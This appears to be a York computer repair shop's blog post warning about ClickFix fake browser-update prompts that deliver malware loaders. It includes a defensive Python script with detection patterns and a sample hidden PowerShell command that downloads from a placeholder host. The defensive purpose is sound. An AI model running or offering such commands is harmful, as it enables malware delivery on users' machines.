
Fake 'Update Your Browser' Prompts Are Hijacking Windows PCs — What York Users Need to Know

York Computer Repair

Security researchers warned this week that a wave of new 'ClickFix' attacks is infecting Windows PCs at scale by disguising malware as routine browser update prompts and 'verify you are human' boxes. Three independent reports published June 16 detail how the technique is now delivering brand-new malware loaders tied to ransomware crews — and it works because the victim, not a vulnerability, runs the malicious command.

What ClickFix is, in plain English

ClickFix is a social-engineering trick that pops up a convincing fake error, CAPTCHA, or update notice in a web browser and instructs the user to 'fix' the problem by pressing Windows+R, pasting a command, and hitting Enter. That command quietly downloads malware. Researchers describe ClickFix as having graduated from a clever social engineering trick to a mature malware delivery ecosystem, succeeding not because of sophisticated exploits but because it weaponizes one of the oldest vulnerabilities in cybersecurity: humans follow instructions, especially when they appear to come from an authoritative-looking prompt.

This week three security firms (Morphisec, BlueVoyant, and Huntress) published separate reports showing the technique is now being used to deliver three different malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, respectively.

What gets installed if you fall for it

These aren't harmless adware infections. The loaders are stepping stones to information stealers, remote access trojans, and ransomware. The attack begins with ClickFix, a social engineering technique that convinces users to run attacker-supplied commands through trusted operating system utilities, then transitions into a multi-stage loader that chains hidden PowerShell, in-memory shellcode, DLL sideloading, external payload storage, and callback-based execution to deliver information stealers and remote access trojans.

The Lorem Ipsum chain is the most alarming for home users and small businesses. The Lorem Ipsum ecosystem has been attributed with high confidence to a financially motivated threat actor known as Vanilla Tempest (aka Rapid Brigantine, Vice Society, and Vice Spider) that's known for deploying ransomware families like Rhysida, BlackCat, Zeppelin, and Quantum Locker. The Potemkin chain is built to steal saved browser passwords: the loader serves as a conduit for EtherRAT and RMMProject, a Lua-scriptable DLL with modules to enable remote screen control and browser credential theft by getting around Chromium's App-Bound Encryption (ABE) protections. If your machine starts behaving oddly after one of these prompts, you'll want professional malware cleanup before logging into anything sensitive.

Why the lures look so convincing now

Until recently, attackers tricked victims into running signed installers that looked like legitimate Microsoft Teams downloads. That changed in late May. Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates; the loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely.

The attackers pivoted to hacked websites. The ClickFix technique has been observed in an active campaign that uses at least five compromised WordPress sites as a starting point to deliver the Lorem Ipsum Loader, with the hacked websites spanning multiple sectors including architecture, legal services, and construction technology. The fake prompt itself is usually styled as a Microsoft Edge security update. Attack sequences distributing Lorem Ipsum Loader make use of ClickFix-style Edge web browser security update lures to run a malicious command that downloads a ZIP file and an outdated version of Node.js released in 2017 (version 7.10.1) to execute JavaScript-based payloads. Translation: an everyday legitimate-looking small-business website can serve you a fake update box, and once you paste that command, your PC is doing the attacker's work for it.

How to recognize and avoid ClickFix prompts

There is one rule that defeats every version of this attack: legitimate websites will never ask you to open the Run box, paste a command, or press Windows+R to fix anything. Not to prove you're human, not to update your browser, not to view a document, not ever.

Real browser updates happen inside the browser's own settings menu, not through a webpage popup. Real Windows updates come through Settings → Windows Update, not from a site you happened to visit. If you see a prompt walking you through keyboard shortcuts and copy-paste steps, close the tab. If you already ran the command, disconnect the PC from the internet and bring it in — these infections often persist after a restart and can spread to mapped drives, making professional cleanup and file recovery the safer route than trying to remove them yourself.
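For readers who want to see how a technician can check whether a pasted command ran: Windows records Run-box history per user under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The sketch below is an added example, not code from this article or the cited reports; the signal patterns are illustrative assumptions and the sample data is constructed.

```python
import re

# Heuristics are illustrative assumptions, not indicators from the cited reports.
SIGNALS = {
    "script host": re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|curl|certutil|bitsadmin|msiexec)(\.exe)?\b", re.I),
    "hidden window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),
    "remote fetch": re.compile(r"https?://|\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I),
    "encoded command": re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "decoy text": re.compile(r"(captcha|robot|human|verif)", re.I),
}

def parse_runmru(values):
    """Return Run-dialog commands, newest first, from RunMRU value data."""
    cmds = []
    for letter in values.get("MRUList", ""):      # MRUList gives the order
        data = values.get(letter)
        if data is not None:
            # Each stored command carries a trailing "\1" marker.
            cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds

def triage(values):
    """Flag commands that start a script host and show at least one more signal."""
    findings = []
    for cmd in parse_runmru(values):
        hits = [name for name, rx in SIGNALS.items() if rx.search(cmd)]
        if "script host" in hits and len(hits) >= 2:
            findings.append((cmd, hits))
    return findings

# Constructed sample of RunMRU contents on a PC where the user followed a
# fake prompt. example.invalid is a placeholder, not a real indicator.
SAMPLE = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\scans\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/update.zip" # Verify you are human\\1',
}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(f"SUSPICIOUS: {cmd}\n  signals: {', '.join(hits)}")
```

A clean or empty history does not rule out infection, because the key is writable by the user's own account and can be cleared.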

What This Means for York, PA

York-area home users and small businesses are exactly the audience these campaigns are built to hit — the fake prompts now live on hacked legal, architecture, and small-business WordPress sites that a York County visitor could reach from a normal Google search. If you've seen one of these 'paste this to continue' boxes on any PC at home or at the office, power it down and bring it to York Computer Repair at 2069 Carlisle Rd — we can confirm whether anything ran and clean it before passwords or files get stolen.
